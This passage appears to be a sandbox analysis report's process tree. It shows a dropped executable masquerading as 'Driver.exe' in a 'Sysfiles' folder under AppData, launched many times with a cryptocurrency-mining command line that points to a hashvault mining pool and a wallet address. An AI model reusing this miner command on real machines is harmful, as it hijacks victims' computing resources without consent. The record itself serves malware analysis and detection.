        6⤵
        
        PID:2644
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:4932
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:400
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3692
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4040
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1424
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2376
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2160
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3480
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:4808
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2112
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2888
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:4276
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:4740
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3668
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:660
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1184
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:4540
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2284
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2520
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3136
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1088
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:908
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1188
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3096
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3424
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3720
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1864
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1668
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1472
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:4060
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3468
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3680
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:716
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4552
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4944
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3092
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3644
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3136
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4412
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3844
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3844 -s 328
        6⤵
        
        PID:2160
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:2700
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3156
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4520
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3908
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:2888
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4560
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:5108
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3452
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3324
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:2208
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:5016
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4724
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4552
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3080
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3748
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3644
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4776
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4596
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4452
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3588
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:556
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:752
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:2476
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:816
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3284
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3316
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4172
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4996
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
